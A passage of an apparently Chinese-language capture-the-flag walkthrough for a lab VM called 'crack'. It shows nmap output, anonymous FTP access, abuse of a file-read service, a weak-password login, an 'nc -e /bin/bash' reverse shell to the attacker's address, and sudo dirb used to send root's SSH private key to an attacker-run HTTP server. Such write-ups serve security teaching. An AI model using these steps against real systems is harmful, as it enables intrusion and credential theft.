3) scan.\nInitiating NSE at 08:07\nCompleted NSE at 08:07, 0.00s elapsed\nInitiating Ping Scan at 08:07\nScanning 192.168.0.102 [2 ports]\nCompleted Ping Scan at 08:07, 0.00s elapsed (1 total hosts)\nInitiating Parallel DNS resolution of 1 host. at 08:07\nCompleted Parallel DNS resolution of 1 host. at 08:07, 0.01s elapsed\nDNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 1, NX: 0, DR: 0, SF: 0, TR: 1, CN: 0]\nInitiating Connect Scan at 08:07\nScanning crack (192.168.0.102) [3 ports]\nDiscovered open port 21\/tcp on 192.168.0.102\nDiscovered open port 4200\/tcp on 192.168.0.102\nDiscovered open port 12359\/tcp on 192.168.0.102\nCompleted Connect Scan at 08:07, 0.00s elapsed (3 total ports)\nInitiating Service scan at 08:07\nScanning 3 services on crack (192.168.0.102)\nCompleted Service scan at 08:07, 17.12s elapsed (3 services on 1 host)\nNSE: Script scanning 192.168.0.102.\nNSE: Starting runlevel 1 (of 3) scan.\nInitiating NSE at 08:07\nNSE: [ftp-bounce 192.168.0.102:21] PORT response: 500 Illegal PORT command.\nCompleted NSE at 08:07, 7.06s elapsed\nNSE: Starting runlevel 2 (of 3) scan.\nInitiating NSE at 08:07\nCompleted NSE at 08:07, 1.16s elapsed\nNSE: Starting runlevel 3 (of 3) scan.\nInitiating NSE at 08:07\nCompleted NSE at 08:07, 0.00s elapsed\nNmap scan report for crack (192.168.0.102)\nHost is up, received conn-refused (0.00040s latency).\nScanned at 2024-04-22 08:07:22 EDT for 25s\n\nPORT STATE SERVICE REASON VERSION\n21\/tcp open ftp syn-ack vsftpd 3.0.3\n| ftp-anon: Anonymous FTP login allowed (FTP code 230)\n|_drwxrwxrwx 2 0 0 4096 Jun 07 2023 upload [NSE: writeable]\n| ftp-syst: \n| STAT: \n| FTP server status:\n| Connected to ::ffff:192.168.0.143\n| Logged in as ftp\n| TYPE: ASCII\n| No session bandwidth limit\n| Session timeout in seconds is 300\n| Control connection is plain text\n| Data connections will be plain text\n| At session startup, client count was 2\n| vsFTPd 3.0.3 - secure, fast, stable\n|_End of status\n4200\/tcp open ssl\/http syn-ack ShellInABox\n|_ssl-date: TLS randomness does not represent time\n|_http-title: Shell In A Box\n| http-methods: \n|_ Supported Methods: GET POST OPTIONS HEAD\n| ssl-cert: Subject: commonName=crack\n| Issuer: commonName=crack\n| Public Key type: rsa\n| Public Key bits: 2048\n| Signature Algorithm: sha256WithRSAEncryption\n| Not valid before: 2023-06-07T10:20:13\n| Not valid after: 2043-06-02T10:20:13\n| MD5: c63b:e888:4cb9:a338:dbc5:4f7b:d515:2d14\n| SHA-1: 2082:49e1:a5cd:889a:4df2:10ed:6370:ac43:cc04:0ffc\n| -----BEGIN CERTIFICATE-----\n| MIIDATCCAemgAwIBAgIUD80eYcXiFUkFj6DPtPttqvoiqGgwDQYJKoZIhvcNAQEL\n| BQAwEDEOMAwGA1UEAwwFY3JhY2swHhcNMjMwNjA3MTAyMDEzWhcNNDMwNjAyMTAy\n| MDEzWjAQMQ4wDAYDVQQDDAVjcmFjazCCASIwDQYJKoZIhvcNAQEBBQADggEPADCC\n| AQoCggEBAN60d\/vu8L4ff\/3dS6sl3dOHq4RdrTmSSmMngqo7TYoitpRVHaiPNwtF\n| W0hPILjY9y1GUMUXx3e+Fo4EaPYETf22A9y1gtFov64d6\/WfHyhLcAOinYScMW1Q\n| hgXeRU5ne4DHnb71YmOQade1ogVs8cb9M\/kitw32L\/BBOQZps0OPXVSwJbBKEezG\n| BtBAACTQnoUBJn0P+MxTpSZGPHd5W8lWkr2ryzqhGeErOOT7ANI32\/OR4qFfR2gI\n| MOjpT3\/r\/nVFoiURjYmjogOTwEuP1DqLzdup1DOFE1kLvtQNtweLZcaFVq0GRDur\n| zBXbHCpmxfXRwadaUspdCAEQuLdDQj8CAwEAAaNTMFEwHQYDVR0OBBYEFLkZLivE\n| NMtHEZBBmcRHn8zEHJasMB8GA1UdIwQYMBaAFLkZLivENMtHEZBBmcRHn8zEHJas\n| MA8GA1UdEwEB\/wQFMAMBAf8wDQYJKoZIhvcNAQELBQADggEBABlhLlrhUqaHEggk\n| 0bWyIXtshHDdYF1r5KKRiSQvuRJDRVmTmK6oSC5TjYzjHBtN4D4calhJLas4CO5v\n| CCX1RVovHrq21r0mHoZGiLMQAzajNk3JTNAP8d5Fj+H5pkGyov7meh0xJBCZjVWb\n| Je5DabD1d4c7s7+xpgbtitKf2SqNNoaX\/xmMTDdA+omDl6Uej6hA\/DKCZjCspyf+\n| ubtzgUDy4GMxartz93Sngm7ofeXEUHJ6eJrmB6O\/ey8KFfGrdkTecbZphc9yHxVY\n| RYFcqSf1FKR38lnKaAqYUAhGnDQT7\/EgMKvV5Je0UpZHnJX2+9DAzvvle0BUwriO\n| c37M3rg=\n|_-----END CERTIFICATE-----\n|_http-favicon: Unknown favicon MD5: 2AB43FA7D288987C3DBE15F0C53EE407\n12359\/tcp open unknown syn-ack\n| fingerprint-strings: \n| GenericLines: \n| File to read:NOFile to read:\n| NULL: \n|_ File to read:\n1 service unrecognized despite returning data. If you know the service\/version, please submit the following fingerprint at https:\/\/nmap.org\/cgi-bin\/submit.cgi?new-service :\nSF-Port12359-TCP:V=7.94SVN%I=7%D=4\/22%Time=66265300%P=x86_64-pc-linux-gnu%\nSF:r(NULL,D,"File\\x20to\\x20read:")%r(GenericLines,1C,"File\\x20to\\x20read:N\nSF:OFile\\x20to\\x20read:");\nService Info: OS: Unix\n\nNSE: Script Post-scanning.\nNSE: Starting runlevel 1 (of 3) scan.\nInitiating NSE at 08:07\nCompleted NSE at 08:07, 0.00s elapsed\nNSE: Starting runlevel 2 (of 3) scan.\nInitiating NSE at 08:07\nCompleted NSE at 08:07, 0.00s elapsed\nNSE: Starting runlevel 3 (of 3) scan.\nInitiating NSE at 08:07\nCompleted NSE at 08:07, 0.00s elapsed\nRead data files from: \/usr\/bin\/..\/share\/nmap\nService detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 25.93 seconds<\/code><\/pre>\nFTP<\/h3>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/crack]\n\u2514\u2500$ ftp 192.168.0.102\nConnected to 192.168.0.102.\n220 (vsFTPd 3.0.3)\nName (192.168.0.102:kali): anonymous\n331 Please specify the password.\nPassword: \n230 Login successful.\nRemote system type is UNIX.\nUsing binary mode to transfer files.\nftp> pwd\nRemote directory: \/\nftp> ls -la\n229 Entering Extended Passive Mode (|||5945|)\n150 Here comes the directory listing.\ndrwxr-xr-x 3 0 114 4096 Jun 07 2023 .\ndrwxr-xr-x 3 0 114 4096 Jun 07 2023 ..\ndrwxrwxrwx 2 0 0 4096 Jun 07 2023 upload\n226 Directory send OK.\nftp> cd upload\n250 Directory successfully changed.\nftp> ls -la\n229 Entering Extended Passive Mode (|||8782|)\n150 Here comes the directory listing.\ndrwxrwxrwx 2 0 0 4096 Jun 07 2023 .\ndrwxr-xr-x 3 0 114 4096 Jun 07 2023 ..\n-rwxr-xr-x 1 1000 1000 849 Jun 07 2023 crack.py\n226 Directory send OK.\nftp> get crack.py\nlocal: crack.py remote: crack.py\n229 Entering Extended Passive Mode (|||56825|)\n150 Opening BINARY mode data connection for crack.py (849 bytes).\n100% |***********************************************************************************************************| 849 34.39 KiB\/s 00:00 ETA\n226 Transfer complete.\n849 bytes received in 00:00 (33.63 KiB\/s)\nftp> exit\n221 Goodbye.\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/crack]\n\u2514\u2500$ cat crack.py \nimport os\nimport socket\ns = socket.socket()\ns.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\nport = 12359\ns.bind(('', port))\ns.listen(50)\n\nc, addr = s.accept()\nno = "NO"\nwhile True:\n try:\n c.send('File to read:'.encode())\n data = c.recv(1024)\n file = (str(data, 'utf-8').strip())\n filename = os.path.basename(file)\n check = "\/srv\/ftp\/upload\/"+filename\n if os.path.isfile(check) and os.path.isfile(file):\n f = open(file,"r")\n lines = f.readlines()\n lines = str(lines)\n lines = lines.encode()\n c.send(lines)\n else:\n c.send(no.encode())\n except ConnectionResetError:\n pass<\/code><\/pre>\n\u6f0f\u6d1e\u5229\u7528<\/h2>\n12359<\/h3>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/crack]\n\u2514\u2500$ nc 192.168.0.102 12359\nFile to read:\/etc\/passwd\nNOFile to read:..\/..\/..\/..\/..\/etc\/passwd\nNOFile to read:crack.py\n['import os\\n', 'import socket\\n', 's = socket.socket()\\n', 's.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\\n', 'port = 12359\\n', "s.bind(('', port))\\n", 's.listen(50)\\n', '\\n', 'c, addr = s.accept()\\n', 'no = "NO"\\n', 'while True:\\n', ' try:\\n', " c.send('File to read:'.encode())\\n", ' data = c.recv(1024)\\n', " file = (str(data, 'utf-8').strip())\\n", ' filename = os.path.basename(file)\\n', ' check = "\/srv\/ftp\/upload\/"+filename\\n', ' if os.path.isfile(check) and os.path.isfile(file):\\n', ' f = open(file,"r")\\n', ' lines = f.readlines()\\n', ' lines = str(lines)\\n', ' lines = lines.encode()\\n', ' c.send(lines)\\n', ' else:\\n', ' c.send(no.encode())\\n', ' except ConnectionResetError:\\n', ' pass\\n']File to read:\nNOFile to read:<\/code><\/pre>\n\u6240\u4ee5\u4e0d\u53ef\u4ee5\u8fdb\u884c\u76ee\u5f55\u7a7f\u8d8a\u3002\u3002\u3002\u3002<\/p>\n
\u5c1d\u8bd5\u4e0a\u4f20\u4e00\u4e2a\u540c\u540d\u6587\u4ef6\uff0c\u770b\u770b\u53ef\u4e0d\u53ef\u4ee5\uff01<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/crack]\n\u2514\u2500$ ftp 192.168.0.102\nConnected to 192.168.0.102.\n220 (vsFTPd 3.0.3)\nName (192.168.0.102:kali): anonymous\n331 Please specify the password.\nPassword: \n230 Login successful.\nRemote system type is UNIX.\nUsing binary mode to transfer files.\nftp> cd upload\n250 Directory successfully changed.\nftp> put passwd\nlocal: passwd remote: passwd\n229 Entering Extended Passive Mode (|||12526|)\n150 Ok to send data.\n 0 0.00 KiB\/s \n226 Transfer complete.\nftp> exit\n221 Goodbye.\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/crack]\n\u2514\u2500$ nc 192.168.0.102 12359\nFile to read:\/etc\/passwd\n['root:x:0:0:root:\/root:\/bin\/bash\\n', 'daemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\\n', 'bin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\\n', 'sys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\\n', 'sync:x:4:65534:sync:\/bin:\/bin\/sync\\n', 'games:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\\n', 'man:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\\n', 'lp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\\n', 'mail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\\n', 'news:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\\n', 'uucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\\n', 'proxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\\n', 'www-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\\n', 'backup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\\n', 'list:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\\n', 'irc:x:39:39:ircd:\/run\/ircd:\/usr\/sbin\/nologin\\n', 'gnats:x:41:41:Gnats Bug-Reporting System (admin):\/var\/lib\/gnats:\/usr\/sbin\/nologin\\n', 'nobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\\n', '_apt:x:100:65534::\/nonexistent:\/usr\/sbin\/nologin\\n', 'systemd-network:x:101:102:systemd Network Management,,,:\/run\/systemd:\/usr\/sbin\/nologin\\n', 'systemd-resolve:x:102:103:systemd Resolver,,,:\/run\/systemd:\/usr\/sbin\/nologin\\n', 'messagebus:x:103:109::\/nonexistent:\/usr\/sbin\/nologin\\n', 'systemd-timesync:x:104:110:systemd Time Synchronization,,,:\/run\/systemd:\/usr\/sbin\/nologin\\n', 'sshd:x:105:65534::\/run\/sshd:\/usr\/sbin\/nologin\\n', 'cris:x:1000:1000:cris,,,:\/home\/cris:\/bin\/bash\\n', 'systemd-coredump:x:999:999:systemd Core Dumper:\/:\/usr\/sbin\/nologin\\n', 'shellinabox:x:106:112:Shell In A Box,,,:\/var\/lib\/shellinabox:\/usr\/sbin\/nologin\\n', 'ftp:x:107:114:ftp daemon,,,:\/srv\/ftp:\/usr\/sbin\/nologin\\n']File to read:<\/code><\/pre>\n\u770b\u6765\u4ed6\u8fd9\u4e2a\u68c0\u6d4b\u53ea\u662f\u68c0\u6d4b\u662f\u5426\u5b58\u5728\u6587\u4ef6\uff01\u53d1\u73b0\u5b58\u5728bash\u7528\u6237\uff1acris<\/code><\/p>\n4200<\/h3>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/crack]\n\u2514\u2500$ curl http:\/\/192.168.0.102:4200\ncurl: (52) Empty reply from server\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/crack]\n\u2514\u2500$ curl https:\/\/192.168.0.102:4200\ncurl: (60) SSL certificate problem: self-signed certificate\nMore details here: https:\/\/curl.se\/docs\/sslcerts.html\n\ncurl failed to verify the legitimacy of the server and therefore could not\nestablish a secure connection to it. To learn more about this situation and\nhow to fix it, please visit the web page mentioned above.<\/code><\/pre>\n\u4f7f\u7528cris<\/code>\u8fdb\u884c\u5c1d\u8bd5\uff1a<\/p>\n<\/div><\/p>\n\u5f31\u5bc6\u7801cris:cris<\/code>\u767b\u5f55\u6210\u529f\uff01<\/p>\n\u63d0\u6743<\/h2>\n\u4fe1\u606f\u641c\u96c6<\/h3>\n
<\/div><\/p>\n\u4e0d\u597d\u5f04wp\uff0c\u5f39\u5230kali\u4e0a\u53bb\uff1a<\/p>\n
nc -e \/bin\/bash 192.168.0.143 1234<\/code><\/pre>\n<\/div><\/p>\n\u7ee7\u7eed\u641c\u96c6\u4fe1\u606f\uff1a<\/p>\n
(remote) cris@crack:\/home\/cris$ ls -la\ntotal 44\ndrwxr-xr-x 3 cris cris 4096 jun 7 2023 .\ndrwxr-xr-x 3 root root 4096 jun 7 2023 ..\nlrwxrwxrwx 1 cris cris 9 jun 7 2023 .bash_history -> \/dev\/null\n-rw-r--r-- 1 cris cris 220 jun 7 2023 .bash_logout\n-rw-r--r-- 1 cris cris 3526 jun 7 2023 .bashrc\n-rwxr-xr-x 1 cris cris 849 jun 7 2023 crack.py\ndrwxr-xr-x 3 cris cris 4096 jun 7 2023 .local\n-rw-r--r-- 1 cris cris 807 jun 7 2023 .profile\n-rw-r--r-- 1 cris cris 66 jun 7 2023 .selected_editor\n-rw------- 1 cris cris 19 jun 7 2023 user.txt\n-rw------- 1 cris cris 51 jun 7 2023 .Xauthority\n-rwxr-xr-x 1 cris cris 170 jun 7 2023 ziempre.py\n(remote) cris@crack:\/home\/cris$ cat user.txt \neG4TUsTBxSFjTOPHMV\n(remote) cris@crack:\/home\/cris$ sudo -l\nMatching Defaults entries for cris on crack:\n env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\n\nUser cris may run the following commands on crack:\n (ALL) NOPASSWD: \/usr\/bin\/dirb\n(remote) cris@crack:\/home\/cris$ cat ziempre.py \n#!\/usr\/local\/lib\/python3.7\nfrom subprocess import Popen\nimport sys\nprogram = "\/home\/cris\/crack.py"\nwhile True:\n p = Popen("python3 "+program, shell=True)\n p.wait()<\/code><\/pre>\n\u63d0\u6743\u81f3root<\/h3>\n
\u56e0\u4e3a\u53ef\u4ee5\u4f7f\u7528dirb<\/code>\u8fdb\u884c\u626b\u63cf\uff0c\u6240\u4ee5\u6211\u4eec\u53ef\u4ee5\u62ff\u654f\u611f\u6587\u4ef6\u4f5c\u4e3a\u5b57\u5178\u8fdb\u884c\u626b\u63cf\uff01<\/p>\n(remote) cris@crack:\/home\/cris$ sudo \/usr\/bin\/dirb http:\/\/192.168.0.143:8888\/ \/root\/.ssh\/id_rsa\n\n-----------------\nDIRB v2.22 \nBy The Dark Raver\n-----------------\n\nSTART_TIME: Mon Apr 22 14:32:16 2024\nURL_BASE: http:\/\/192.168.0.143:8888\/\nWORDLIST_FILES: \/root\/.ssh\/id_rsa\n\n-----------------\n\nGENERATED WORDS: 38 \n\n---- Scanning URL: http:\/\/192.168.0.143:8888\/ ----\n\n-----------------\nEND_TIME: Mon Apr 22 14:32:17 2024\nDOWNLOADED: 38 - FOUND: 0<\/code><\/pre>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/crack]\n\u2514\u2500$ python3 -m http.server 8888\nServing HTTP on 0.0.0.0 port 8888 (http:\/\/0.0.0.0:8888\/) ...\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] code 404, message File not found\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] "GET \/randomfile1 HTTP\/1.1" 404 -\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] code 404, message File not found\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] "GET \/frand2 HTTP\/1.1" 404 -\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] code 404, message File not found\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] "GET \/-----BEGIN HTTP\/1.1" 404 -\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] code 404, message File not found\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] "GET \/b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn HTTP\/1.1" 404 -\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] code 404, message File not found\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] "GET \/NhAAAAAwEAAQAAAYEAxBvRe3EH67y9jIt2rwa79tvPDwmb2WmYv8czPn4bgSCpFmhDyHwn HTTP\/1.1" 404 -\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] code 404, message File not found\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] "GET \/b0IUyyw3iPQ3LlTYyz7qEc2vaj1xqlDgtafvvtJ2EJAJCFy5osyaqbYKgAkGkQMzOevdGt HTTP\/1.1" 404 -\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] code 404, message File not found\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] "GET \/xNQ8NxRO4\/bC1v90lUrhyLi\/ML5B4nak+5vLFJi8NlwXMQJ\/xCWZg5+WOLduFp4VvHlwAf HTTP\/1.1" 404 -\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] code 404, message File not found\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] "GET \/tDh2C+tJp2hqusW1jZRqSXspCfKLPt\/v7utpDTKtofxFvSS55MFciju4dIaZLZUmiqoD4k HTTP\/1.1" 404 -\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] code 404, message File not found\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] "GET \/\/+FwJbMna8iPwmvK6n\/2bOsE1+nyKbkbvDG5pjQ3VBtK23BVnlxU4frFrbicU+VtkClfMu HTTP\/1.1" 404 -\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] code 404, message File not found\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] "GET \/yp7muWGA1ydvYUruoOiaURYupzuxw25Rao0Sb8nW1qDBYH3BETPCypezQXE22ZYAj0ThSl HTTP\/1.1" 404 -\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] code 404, message File not found\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] "GET \/Kn2aZN\/8xWAB+\/t96TcXogtSbQw\/eyp9ecmXUpq5i1kBbFyJhAJs7x37WM3\/Cb34a\/6v8c HTTP\/1.1" 404 -\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] code 404, message File not found\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] "GET \/9rMjGl9HMZFDwswzAGrvPOeroVB\/TpZ+UBNGE1znAAAFgC5UADIuVAAyAAAAB3NzaC1yc2 HTTP\/1.1" 404 -\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] code 404, message File not found\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] "GET \/EAAAGBAMQb0XtxB+u8vYyLdq8Gu\/bbzw8Jm9lpmL\/HMz5+G4EgqRZoQ8h8J29CFMssN4j0 HTTP\/1.1" 404 -\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] code 404, message File not found\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] "GET \/Ny5U2Ms+6hHNr2o9capQ4LWn777SdhCQCQhcuaLMmqm2CoAJBpEDMznr3RrcTUPDcUTuP2 HTTP\/1.1" 404 -\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] code 404, message File not found\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] "GET \/wtb\/dJVK4ci4vzC+QeJ2pPubyxSYvDZcFzECf8QlmYOflji3bhaeFbx5cAH7Q4dgvrSado HTTP\/1.1" 404 -\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] code 404, message File not found\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] "GET \/arrFtY2Uakl7KQnyiz7f7+7raQ0yraH8Rb0kueTBXIo7uHSGmS2VJoqqA+JP\/hcCWzJ2vI HTTP\/1.1" 404 -\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] code 404, message File not found\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] "GET \/j8Jryup\/9mzrBNfp8im5G7wxuaY0N1QbSttwVZ5cVOH6xa24nFPlbZApXzLsqe5rlhgNcn HTTP\/1.1" 404 -\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] code 404, message File not found\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] "GET \/b2FK7qDomlEWLqc7scNuUWqNEm\/J1tagwWB9wREzwsqXs0FxNtmWAI9E4UpSp9mmTf\/MVg HTTP\/1.1" 404 -\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] code 404, message File not found\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] "GET \/Afv7fek3F6ILUm0MP3sqfXnJl1KauYtZAWxciYQCbO8d+1jN\/wm9+Gv+r\/HPazIxpfRzGR HTTP\/1.1" 404 -\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] code 404, message File not found\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] "GET \/Q8LMMwBq7zznq6FQf06WflATRhNc5wAAAAMBAAEAAAGAeX9uopbdvGx71wZUqo12iLOYLg HTTP\/1.1" 404 -\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] code 404, message File not found\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] "GET \/3a87DbhP2KPw5sRe0RNSO10xEwcVq0fUfQxFXhlh\/VDN7Wr98J7b1RnZ5sCb+Y5lWH9iz2 HTTP\/1.1" 404 -\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] code 404, message File not found\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] "GET \/m6qvDDDNJZX2HWr6GX+tDhaWLt0MNY5xr64XtxLTipZxE0n2Hueel18jNldckI4aLbAKa\/ HTTP\/1.1" 404 -\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] code 404, message File not found\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] "GET \/a4rL058j5AtMS6lBWFvqxZFLFr8wEECdBlGoWzkjGJkMTBsPLP8yzEnlipUxGgTR\/3uSMN HTTP\/1.1" 404 -\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] code 404, message File not found\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] "GET \/peiKDzLI\/Y+QcQku\/7GmUIV4ugP0fjMnz\/XcXqe6GVNX\/gvNeT6WfKPCzcaXiF4I2i228u HTTP\/1.1" 404 -\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] code 404, message File not found\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] "GET \/TB9Ga5PNU2nYzJAQcAVvDwwC4IiNsDTdQY+cSOJ0KCcs2cq59EaOoZHY6Od88900V3MKFG HTTP\/1.1" 404 -\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] code 404, message File not found\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] "GET \/TwielzW1Nqq1ltaQYMtnILxzEeXJFp6LlqFTF4Phf\/yUyK04a6mhFg3kJzsxE+iDOVH28D HTTP\/1.1" 404 -\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] code 404, message File not found\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] "GET \/Unj2OgO53KJ2FdLBHkUDlXMaDsISuizi0aj2MnhCryfHefhIsi1JdFyMhVuXCzNGUBAAAA HTTP\/1.1" 404 -\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] code 404, message File not found\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] "GET \/wQDlr9NWE6q1BovNNobebvw44NdBRQE\/1nesegFqlVdtKM61gHYWJotvLV79rjjRfjnGHo HTTP\/1.1" 404 -\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] code 404, message File not found\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] "GET \/0MoSXZXiC\/0\/CSfe6Je7unnIzhiA85jSe\/u2dIviqItTc2CBRtOZl7Vrflt7lasT7J1WAO HTTP\/1.1" 404 -\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] code 404, message File not found\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] "GET \/1ROwaN5uL26gIgtf\/Y7Rhi0wFPN289UI2gjeVQKhXBObVm3qY7yZh8JpLPH5w0Xeuo20sP HTTP\/1.1" 404 -\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] code 404, message File not found\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] "GET \/WchZl0D8KSZUKhlPU6Pibqmj9bAAm7hwFecuQMeS+nxg1qIGYAAADBAOZ1XurOyyH9RWIo HTTP\/1.1" 404 -\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] code 404, message File not found\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] "GET \/0sTQ3d\/kJNgTNHAs4Y0SxSOejC+N3tEU33GU3P+ppfHYy595rX7MX4o3gqXFpAaHRIAupr HTTP\/1.1" 404 -\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] code 404, message File not found\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] "GET \/DbenB1HQW4o6Gg+SF2GWPAQeuDbCsLM9P8XOiQIjTuCvYwHUdFD7nWMJ5Sqr6EeBV+CYw1 HTTP\/1.1" 404 -\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] code 404, message File not found\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] "GET \/Tg5PIU3FsnN5D3QOHVpGNo2qAvi+4CD0BC5fxOs6cZ1RBqbJ1kanw1H6fF8nRRBds+26Bl HTTP\/1.1" 404 -\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] code 404, message File not found\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] "GET \/\/RGZHTBPLVenhNmWN2fje3GDBqVeIbZwAAAMEA2dfdjpefYEgtF0GMC9Sf5UzKIEKQMzoh HTTP\/1.1" 404 -\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] code 404, message File not found\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] "GET \/oxY6YRERurpcyYuSa\/rxIP2uxu1yjIIcO4hpsQaoipTM0T9PS56CrO+FN9mcIcXCj5SVEq HTTP\/1.1" 404 -\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] code 404, message File not found\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] "GET \/2UVzu9LS0PdqPmniNmWglwvAbkktcEmbmCLYoh5GBxm9VhcL69dhzMdVe73Z9QhNXnMDlf HTTP\/1.1" 404 -\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] code 404, message File not found\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] "GET \/6xpD9lHWyp+ocD\/meYC7V8aio\/W9VxL25NlYwdFyCgecd\/rIJQ+tGPXoqXIKrf5lVrVtFC HTTP\/1.1" 404 -\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] code 404, message File not found\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] "GET \/s8IoeeQHSidUKBAAAACnJvb3RAY3JhY2s= HTTP\/1.1" 404 -\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] code 404, message File not found\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] "GET \/-----END HTTP\/1.1" 404 -<\/code><\/pre>\n\u6574\u7406\u4e00\u4e0b\u5f97\u5230\u6211\u4eec\u60f3\u8981\u7684\uff01\uff01\uff01\uff01\u4f46\u662f\u624b\u52a8\u641e\u592a\u6162\u4e86\uff0c\u5f53\u7136\u662f\u4ea4\u7ed9\u4e13\u4e1a\u7684\u4eba\u8fa3\uff01<\/p>\n
<\/div><\/p>\n\u7136\u540e\u624b\u52a8\u8865\u5168\u4e00\u4e0b\u6700\u524d\u9762\u7684\u548c\u6700\u540e\u9762\u7684\u5c31\u884c\u4e86\uff01<\/p>\n
